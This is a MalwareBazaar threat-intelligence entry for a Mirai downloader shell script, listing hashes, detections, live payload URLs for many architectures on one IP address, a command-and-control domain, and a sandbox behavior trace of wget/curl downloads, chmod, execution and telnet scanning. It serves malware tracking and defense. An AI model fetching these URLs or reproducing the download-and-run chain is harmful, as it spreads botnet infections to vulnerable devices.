MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1
SHA3-384 hash: d2112e9e6921628fa04a4a06345bba9a9e9d41cc38b9cd9683cfb77ef445ad16aaec2b5c81cc7854eb5b9312d147557d
SHA1 hash: 7af00945bea835e2da8fbfb809de34b62b9c6e45
MD5 hash: b117bb31f1f546a91ec8edb569dda676
humanhash: victor-winter-helium-fillet
File name:nullnet_bash.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'825 bytes
First seen:2026-03-27 15:22:08 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:vfIGIBfIPIXfIcIlfIKIBfIlITnfI+IhfIrIjfIvI5fIwINfIDIBfIkItfIG7IGl:XD4Q6P8rYSmf5scCCQ/o2oRUpUKeSi8l
TLSH T150813DC81330C7327DA28526A1B95AE433C495D355EB8FE1B2F73F619848E1C39A4B91
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter BlinkzSec
Tags:mirai
URLMalware sample (SHA256 hash)SignatureTags
http://144.172.105.56/nullnet_bin_dir/nullnet_load.x861a675737eab617a53c0eea787c995662598d1457ce99efbe306b7d8d28e4d372 Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.mipse06a96e238b0c2c4a72bde8f3f7cd8920fcbb539ae760c110740d8a6c1232c1b Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.mpslba14f0deb074738b8e93d2beed1f72ee65d54f2f41a3b78e7777e0e2e50ab00e Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm625e2ef515c656e7cb5ec6440df58e8e545b55dada1934b24d3c8ae3e767253b Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm5ab92589347b1cb5262aef0b60976352968e012223132d0878d1596fd59acd2e7 Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm694234c40137032359b856140b970d2120a8acb50d64e2d5cbb4779b5ca7413da Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arm7919f83adf548667693bf9056dd14555fcc64b7a855ed4bc1fae0712be2aedc20 Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.ppc8c415a0b9279fc7a5cb72c0fddfe0be53d9da8c092edd55479b8b04ac468f553 Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.m68k1ac41c59155b3e13a8af681ba363b5968162195aeec2c10ea5fae43a9f4c02fb Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.sh4e65da4625748cb6612837f05e19d3a998fac626075f1c15dd5a945421b85ac90 Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.spca20e6b829c391c825949fd971f863ec9d654095db1e1ad5cfe2f05f7d25ee6bc Miraielf mirai ua-wget
http://144.172.105.56/nullnet_bin_dir/nullnet_load.arc205c5c526bf121543297c619245d43c983a34626cd96c7100525fbce6b4867ba Miraimirai
http://144.172.105.56/nullnet_bin_dir/nullnet_load.x86_64b9ff5b1a87001fc513ca0526b5734b1925bdb673f3ed159a36bf6d078e453d5d Miraielf mirai ua-wget
http://144.172.105.56/nullnet_bin_dir/nullnet_load.i686bcf5aa14d139a865aa901f48c665139971a00918a699f4179bd4c468868d04da Miraielf mirai ua-wget
http://144.172.105.56/nullnet_bin_dir/nullnet_load.i4864897019f7d7f09bba05c9cb7eb9215c0cad257b1840ea752cbc90fae3b2fb720 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
42
Origin country :
GB GB
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
medusa mirai
Link:
https://www.filescan.io/uploads/69c6a24b2346b9da57ab665e/reports/64f28e80-2bb5-498e-a60e-ff0287b451c8/overview
Result
Gathering data
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/c61d1d30-8a5a-41ed-9e4c-30c28f7d465e
Behavior Graph:
Download SVG
%3 guuid=2d84407c-1900-0000-6cd7-e777b2070000 pid=1970 /usr/bin/sudo guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975 /tmp/sample.bin guuid=2d84407c-1900-0000-6cd7-e777b2070000 pid=1970->guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975 execve guuid=6d8ea881-1900-0000-6cd7-e777b8070000 pid=1976 /usr/bin/wget net send-data write-file guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=6d8ea881-1900-0000-6cd7-e777b8070000 pid=1976 execve guuid=50003ea6-1900-0000-6cd7-e777eb070000 pid=2027 /usr/bin/curl net send-data write-file guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=50003ea6-1900-0000-6cd7-e777eb070000 pid=2027 execve guuid=52f9f6cc-1900-0000-6cd7-e7773f080000 pid=2111 /usr/bin/cat guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=52f9f6cc-1900-0000-6cd7-e7773f080000 pid=2111 execve guuid=ac0c76cd-1900-0000-6cd7-e77741080000 pid=2113 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=ac0c76cd-1900-0000-6cd7-e77741080000 pid=2113 execve guuid=d3f6d0cd-1900-0000-6cd7-e77744080000 pid=2116 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=d3f6d0cd-1900-0000-6cd7-e77744080000 pid=2116 execve guuid=cccd23ce-1900-0000-6cd7-e77747080000 pid=2119 /usr/bin/wget net send-data write-file guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=cccd23ce-1900-0000-6cd7-e77747080000 pid=2119 execve guuid=4e0561f8-1900-0000-6cd7-e777be080000 pid=2238 /usr/bin/curl net send-data write-file guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=4e0561f8-1900-0000-6cd7-e777be080000 pid=2238 execve guuid=f4665124-1a00-0000-6cd7-e7770a090000 pid=2314 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=f4665124-1a00-0000-6cd7-e7770a090000 pid=2314 clone guuid=10396d24-1a00-0000-6cd7-e7770b090000 pid=2315 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=10396d24-1a00-0000-6cd7-e7770b090000 pid=2315 execve guuid=41cbca24-1a00-0000-6cd7-e7770d090000 pid=2317 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=41cbca24-1a00-0000-6cd7-e7770d090000 pid=2317 execve guuid=02126857-1b00-0000-6cd7-e777700b0000 pid=2928 /usr/bin/wget net send-data write-file guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=02126857-1b00-0000-6cd7-e777700b0000 pid=2928 execve guuid=c1a05681-1b00-0000-6cd7-e777890b0000 pid=2953 /usr/bin/curl net send-data write-file guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=c1a05681-1b00-0000-6cd7-e777890b0000 pid=2953 execve guuid=e3e839ac-1b00-0000-6cd7-e777d20b0000 pid=3026 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=e3e839ac-1b00-0000-6cd7-e777d20b0000 pid=3026 clone guuid=7c255aac-1b00-0000-6cd7-e777d30b0000 pid=3027 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=7c255aac-1b00-0000-6cd7-e777d30b0000 pid=3027 execve guuid=60bea8ac-1b00-0000-6cd7-e777d50b0000 pid=3029 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=60bea8ac-1b00-0000-6cd7-e777d50b0000 pid=3029 execve guuid=83e8ade1-1c00-0000-6cd7-e7771e0e0000 pid=3614 /usr/bin/wget net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=83e8ade1-1c00-0000-6cd7-e7771e0e0000 pid=3614 execve guuid=c932a3e4-1c00-0000-6cd7-e777270e0000 pid=3623 /usr/bin/curl net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=c932a3e4-1c00-0000-6cd7-e777270e0000 pid=3623 execve guuid=4dd08ee9-1c00-0000-6cd7-e7772b0e0000 pid=3627 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=4dd08ee9-1c00-0000-6cd7-e7772b0e0000 pid=3627 clone guuid=f2aac3e9-1c00-0000-6cd7-e7772d0e0000 pid=3629 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=f2aac3e9-1c00-0000-6cd7-e7772d0e0000 pid=3629 execve guuid=2c6c49ea-1c00-0000-6cd7-e7772f0e0000 pid=3631 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=2c6c49ea-1c00-0000-6cd7-e7772f0e0000 pid=3631 execve guuid=db698520-1e00-0000-6cd7-e777bb110000 pid=4539 /usr/bin/wget net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=db698520-1e00-0000-6cd7-e777bb110000 pid=4539 execve guuid=2619c723-1e00-0000-6cd7-e777c4110000 pid=4548 /usr/bin/curl net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=2619c723-1e00-0000-6cd7-e777c4110000 pid=4548 execve guuid=57d7282a-1e00-0000-6cd7-e777dd110000 pid=4573 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=57d7282a-1e00-0000-6cd7-e777dd110000 pid=4573 clone guuid=266a412a-1e00-0000-6cd7-e777de110000 pid=4574 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=266a412a-1e00-0000-6cd7-e777de110000 pid=4574 execve guuid=d5bc9b2a-1e00-0000-6cd7-e777e2110000 pid=4578 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=d5bc9b2a-1e00-0000-6cd7-e777e2110000 pid=4578 execve guuid=29900e62-1f00-0000-6cd7-e77791140000 pid=5265 /usr/bin/wget net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=29900e62-1f00-0000-6cd7-e77791140000 pid=5265 execve guuid=11281b64-1f00-0000-6cd7-e77796140000 pid=5270 /usr/bin/curl net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=11281b64-1f00-0000-6cd7-e77796140000 pid=5270 execve guuid=1f7b7b69-1f00-0000-6cd7-e77797140000 pid=5271 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=1f7b7b69-1f00-0000-6cd7-e77797140000 pid=5271 clone guuid=9b7bc669-1f00-0000-6cd7-e77798140000 pid=5272 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=9b7bc669-1f00-0000-6cd7-e77798140000 pid=5272 execve guuid=31a5236a-1f00-0000-6cd7-e77799140000 pid=5273 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=31a5236a-1f00-0000-6cd7-e77799140000 pid=5273 execve guuid=5771701b-2500-0000-6cd7-e777c4140000 pid=5316 /usr/bin/wget net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=5771701b-2500-0000-6cd7-e777c4140000 pid=5316 execve guuid=a117e71e-2500-0000-6cd7-e777c8140000 pid=5320 /usr/bin/curl net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=a117e71e-2500-0000-6cd7-e777c8140000 pid=5320 execve guuid=f1b75221-2500-0000-6cd7-e777c9140000 pid=5321 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=f1b75221-2500-0000-6cd7-e777c9140000 pid=5321 clone guuid=8b316b21-2500-0000-6cd7-e777ca140000 pid=5322 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=8b316b21-2500-0000-6cd7-e777ca140000 pid=5322 execve guuid=ea2bd721-2500-0000-6cd7-e777cb140000 pid=5323 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=ea2bd721-2500-0000-6cd7-e777cb140000 pid=5323 execve guuid=477c74cd-2a00-0000-6cd7-e777fa140000 pid=5370 /usr/bin/wget net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=477c74cd-2a00-0000-6cd7-e777fa140000 pid=5370 execve guuid=710a77d0-2a00-0000-6cd7-e777ff140000 pid=5375 /usr/bin/curl net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=710a77d0-2a00-0000-6cd7-e777ff140000 pid=5375 execve guuid=91d990d3-2a00-0000-6cd7-e77700150000 pid=5376 /usr/bin/bash guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=91d990d3-2a00-0000-6cd7-e77700150000 pid=5376 clone guuid=d8e7b5d3-2a00-0000-6cd7-e77701150000 pid=5377 /usr/bin/chmod guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=d8e7b5d3-2a00-0000-6cd7-e77701150000 pid=5377 execve guuid=7b151fd4-2a00-0000-6cd7-e77702150000 pid=5378 /tmp/loudscream net guuid=1b5fb680-1900-0000-6cd7-e777b7070000 pid=1975->guuid=7b151fd4-2a00-0000-6cd7-e77702150000 pid=5378 execve 64a3ce45-422e-5632-ac00-2b267176862c 144.172.105.56:80 guuid=6d8ea881-1900-0000-6cd7-e777b8070000 pid=1976->64a3ce45-422e-5632-ac00-2b267176862c send: 161B guuid=50003ea6-1900-0000-6cd7-e777eb070000 pid=2027->64a3ce45-422e-5632-ac00-2b267176862c send: 110B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=d3f6d0cd-1900-0000-6cd7-e77744080000 pid=2116->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=87ad0cce-1900-0000-6cd7-e77745080000 pid=2117 /tmp/loudscream guuid=d3f6d0cd-1900-0000-6cd7-e77744080000 pid=2116->guuid=87ad0cce-1900-0000-6cd7-e77745080000 pid=2117 clone guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118 /tmp/loudscream dns net send-data zombie guuid=d3f6d0cd-1900-0000-6cd7-e77744080000 pid=2116->guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118 clone guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 35B dc38937e-1b8b-586e-ac02-50f88f5f5386 bitches.gunna.pro:1420 guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->dc38937e-1b8b-586e-ac02-50f88f5f5386 send: 16B guuid=a57c25ce-1900-0000-6cd7-e77748080000 pid=2120 /tmp/loudscream guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->guuid=a57c25ce-1900-0000-6cd7-e77748080000 pid=2120 clone guuid=40702ace-1900-0000-6cd7-e77749080000 pid=2121 /tmp/loudscream guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->guuid=40702ace-1900-0000-6cd7-e77749080000 pid=2121 clone guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122 /tmp/loudscream net net-scan send-data guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122 clone guuid=647c35ce-1900-0000-6cd7-e7774b080000 pid=2123 /tmp/loudscream net net-scan send-data guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->guuid=647c35ce-1900-0000-6cd7-e7774b080000 pid=2123 clone guuid=70eb1b09-1a00-0000-6cd7-e777db080000 pid=2267 /tmp/loudscream guuid=1b6012ce-1900-0000-6cd7-e77746080000 pid=2118->guuid=70eb1b09-1a00-0000-6cd7-e777db080000 pid=2267 clone 48d9480c-af89-5d68-89eb-f592f08ead5f bitches.gunna.pro:80 guuid=cccd23ce-1900-0000-6cd7-e77747080000 pid=2119->48d9480c-af89-5d68-89eb-f592f08ead5f send: 162B guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con f8f104c0-c599-584b-b826-07ce26685e2f 34.8.177.193:23 guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122->f8f104c0-c599-584b-b826-07ce26685e2f send: 40B guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122|send-data send-data to 320 IP addresses review logs to see them all guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122->guuid=b4a82dce-1900-0000-6cd7-e7774a080000 pid=2122|send-data send guuid=647c35ce-1900-0000-6cd7-e7774b080000 pid=2123->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=647c35ce-1900-0000-6cd7-e7774b080000 pid=2123|send-data send-data to 640 IP addresses review logs to see them all guuid=647c35ce-1900-0000-6cd7-e7774b080000 pid=2123->guuid=647c35ce-1900-0000-6cd7-e7774b080000 pid=2123|send-data send guuid=4e0561f8-1900-0000-6cd7-e777be080000 pid=2238->48d9480c-af89-5d68-89eb-f592f08ead5f send: 111B guuid=39112709-1a00-0000-6cd7-e777dc080000 pid=2268 /tmp/loudscream guuid=70eb1b09-1a00-0000-6cd7-e777db080000 pid=2267->guuid=39112709-1a00-0000-6cd7-e777dc080000 pid=2268 clone guuid=41cbca24-1a00-0000-6cd7-e7770d090000 pid=2317->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con ad7f156b-fc2d-56ee-9049-c6109de3ade6 0.0.0.0:61420 guuid=41cbca24-1a00-0000-6cd7-e7770d090000 pid=2317->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con guuid=69733e57-1b00-0000-6cd7-e7776d0b0000 pid=2925 /tmp/loudscream guuid=41cbca24-1a00-0000-6cd7-e7770d090000 pid=2317->guuid=69733e57-1b00-0000-6cd7-e7776d0b0000 pid=2925 clone guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926 /tmp/loudscream dns net send-data zombie guuid=41cbca24-1a00-0000-6cd7-e7770d090000 pid=2317->guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926 clone guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 35B guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926->dc38937e-1b8b-586e-ac02-50f88f5f5386 send: 16B guuid=9cc36557-1b00-0000-6cd7-e7776f0b0000 pid=2927 /tmp/loudscream guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926->guuid=9cc36557-1b00-0000-6cd7-e7776f0b0000 pid=2927 clone guuid=388b6e57-1b00-0000-6cd7-e777710b0000 pid=2929 /tmp/loudscream guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926->guuid=388b6e57-1b00-0000-6cd7-e777710b0000 pid=2929 clone guuid=e53d7557-1b00-0000-6cd7-e777720b0000 pid=2930 /tmp/loudscream net net-scan send-data guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926->guuid=e53d7557-1b00-0000-6cd7-e777720b0000 pid=2930 clone guuid=5ab67d57-1b00-0000-6cd7-e777730b0000 pid=2931 /tmp/loudscream net net-scan send-data guuid=42944957-1b00-0000-6cd7-e7776e0b0000 pid=2926->guuid=5ab67d57-1b00-0000-6cd7-e777730b0000 pid=2931 clone guuid=02126857-1b00-0000-6cd7-e777700b0000 pid=2928->48d9480c-af89-5d68-89eb-f592f08ead5f send: 162B guuid=e53d7557-1b00-0000-6cd7-e777720b0000 pid=2930->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=e53d7557-1b00-0000-6cd7-e777720b0000 pid=2930|send-data send-data to 320 IP addresses review logs to see them all guuid=e53d7557-1b00-0000-6cd7-e777720b0000 pid=2930->guuid=e53d7557-1b00-0000-6cd7-e777720b0000 pid=2930|send-data send guuid=5ab67d57-1b00-0000-6cd7-e777730b0000 pid=2931->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=5ab67d57-1b00-0000-6cd7-e777730b0000 pid=2931|send-data send-data to 640 IP addresses review logs to see them all guuid=5ab67d57-1b00-0000-6cd7-e777730b0000 pid=2931->guuid=5ab67d57-1b00-0000-6cd7-e777730b0000 pid=2931|send-data send guuid=c1a05681-1b00-0000-6cd7-e777890b0000 pid=2953->48d9480c-af89-5d68-89eb-f592f08ead5f send: 111B guuid=60bea8ac-1b00-0000-6cd7-e777d50b0000 pid=3029->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=60bea8ac-1b00-0000-6cd7-e777d50b0000 pid=3029->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con guuid=b1dc94e1-1c00-0000-6cd7-e7771c0e0000 pid=3612 /tmp/loudscream guuid=60bea8ac-1b00-0000-6cd7-e777d50b0000 pid=3029->guuid=b1dc94e1-1c00-0000-6cd7-e7771c0e0000 pid=3612 clone guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613 /tmp/loudscream dns net send-data zombie guuid=60bea8ac-1b00-0000-6cd7-e777d50b0000 pid=3029->guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613 clone guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 70B guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613->dc38937e-1b8b-586e-ac02-50f88f5f5386 con guuid=3e89b5e1-1c00-0000-6cd7-e7771f0e0000 pid=3615 /tmp/loudscream guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613->guuid=3e89b5e1-1c00-0000-6cd7-e7771f0e0000 pid=3615 clone guuid=c847bbe1-1c00-0000-6cd7-e777200e0000 pid=3616 /tmp/loudscream guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613->guuid=c847bbe1-1c00-0000-6cd7-e777200e0000 pid=3616 clone guuid=83e1c1e1-1c00-0000-6cd7-e777220e0000 pid=3618 /tmp/loudscream net net-scan send-data guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613->guuid=83e1c1e1-1c00-0000-6cd7-e777220e0000 pid=3618 clone guuid=aaf9c6e1-1c00-0000-6cd7-e777230e0000 pid=3619 /tmp/loudscream net net-scan send-data guuid=7c479ee1-1c00-0000-6cd7-e7771d0e0000 pid=3613->guuid=aaf9c6e1-1c00-0000-6cd7-e777230e0000 pid=3619 clone guuid=83e8ade1-1c00-0000-6cd7-e7771e0e0000 pid=3614->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=83e1c1e1-1c00-0000-6cd7-e777220e0000 pid=3618->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=83e1c1e1-1c00-0000-6cd7-e777220e0000 pid=3618|send-data send-data to 640 IP addresses review logs to see them all guuid=83e1c1e1-1c00-0000-6cd7-e777220e0000 pid=3618->guuid=83e1c1e1-1c00-0000-6cd7-e777220e0000 pid=3618|send-data send guuid=aaf9c6e1-1c00-0000-6cd7-e777230e0000 pid=3619->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=aaf9c6e1-1c00-0000-6cd7-e777230e0000 pid=3619|send-data send-data to 1280 IP addresses review logs to see them all guuid=aaf9c6e1-1c00-0000-6cd7-e777230e0000 pid=3619->guuid=aaf9c6e1-1c00-0000-6cd7-e777230e0000 pid=3619|send-data send guuid=c932a3e4-1c00-0000-6cd7-e777270e0000 pid=3623->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=2c6c49ea-1c00-0000-6cd7-e7772f0e0000 pid=3631->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=2c6c49ea-1c00-0000-6cd7-e7772f0e0000 pid=3631->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con guuid=6a056b20-1e00-0000-6cd7-e777b7110000 pid=4535 /tmp/loudscream guuid=2c6c49ea-1c00-0000-6cd7-e7772f0e0000 pid=3631->guuid=6a056b20-1e00-0000-6cd7-e777b7110000 pid=4535 clone guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536 /tmp/loudscream dns net send-data zombie guuid=2c6c49ea-1c00-0000-6cd7-e7772f0e0000 pid=3631->guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536 clone guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 70B guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536->dc38937e-1b8b-586e-ac02-50f88f5f5386 con guuid=d1497e20-1e00-0000-6cd7-e777b9110000 pid=4537 /tmp/loudscream guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536->guuid=d1497e20-1e00-0000-6cd7-e777b9110000 pid=4537 clone guuid=168a8320-1e00-0000-6cd7-e777ba110000 pid=4538 /tmp/loudscream guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536->guuid=168a8320-1e00-0000-6cd7-e777ba110000 pid=4538 clone guuid=ddb38d20-1e00-0000-6cd7-e777bc110000 pid=4540 /tmp/loudscream net net-scan send-data guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536->guuid=ddb38d20-1e00-0000-6cd7-e777bc110000 pid=4540 clone guuid=2e949920-1e00-0000-6cd7-e777bd110000 pid=4541 /tmp/loudscream net net-scan send-data guuid=87177420-1e00-0000-6cd7-e777b8110000 pid=4536->guuid=2e949920-1e00-0000-6cd7-e777bd110000 pid=4541 clone guuid=db698520-1e00-0000-6cd7-e777bb110000 pid=4539->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=ddb38d20-1e00-0000-6cd7-e777bc110000 pid=4540->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=ddb38d20-1e00-0000-6cd7-e777bc110000 pid=4540|send-data send-data to 800 IP addresses review logs to see them all guuid=ddb38d20-1e00-0000-6cd7-e777bc110000 pid=4540->guuid=ddb38d20-1e00-0000-6cd7-e777bc110000 pid=4540|send-data send guuid=2e949920-1e00-0000-6cd7-e777bd110000 pid=4541->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=2e949920-1e00-0000-6cd7-e777bd110000 pid=4541|send-data send-data to 1600 IP addresses review logs to see them all guuid=2e949920-1e00-0000-6cd7-e777bd110000 pid=4541->guuid=2e949920-1e00-0000-6cd7-e777bd110000 pid=4541|send-data send guuid=2619c723-1e00-0000-6cd7-e777c4110000 pid=4548->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=d5bc9b2a-1e00-0000-6cd7-e777e2110000 pid=4578->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=d5bc9b2a-1e00-0000-6cd7-e777e2110000 pid=4578->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con guuid=95cbf661-1f00-0000-6cd7-e7778f140000 pid=5263 /tmp/loudscream guuid=d5bc9b2a-1e00-0000-6cd7-e777e2110000 pid=4578->guuid=95cbf661-1f00-0000-6cd7-e7778f140000 pid=5263 clone guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264 /tmp/loudscream net send-data zombie guuid=d5bc9b2a-1e00-0000-6cd7-e777e2110000 pid=4578->guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264 clone guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 70B guuid=30281362-1f00-0000-6cd7-e77792140000 pid=5266 /tmp/loudscream guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264->guuid=30281362-1f00-0000-6cd7-e77792140000 pid=5266 clone guuid=d3f31b62-1f00-0000-6cd7-e77793140000 pid=5267 /tmp/loudscream guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264->guuid=d3f31b62-1f00-0000-6cd7-e77793140000 pid=5267 clone guuid=d13b2362-1f00-0000-6cd7-e77794140000 pid=5268 /tmp/loudscream net net-scan send-data zombie guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264->guuid=d13b2362-1f00-0000-6cd7-e77794140000 pid=5268 clone guuid=66fe2862-1f00-0000-6cd7-e77795140000 pid=5269 /tmp/loudscream net net-scan send-data zombie guuid=08770362-1f00-0000-6cd7-e77790140000 pid=5264->guuid=66fe2862-1f00-0000-6cd7-e77795140000 pid=5269 clone guuid=29900e62-1f00-0000-6cd7-e77791140000 pid=5265->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=d13b2362-1f00-0000-6cd7-e77794140000 pid=5268->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=d13b2362-1f00-0000-6cd7-e77794140000 pid=5268|send-data send-data to 2720 IP addresses review logs to see them all guuid=d13b2362-1f00-0000-6cd7-e77794140000 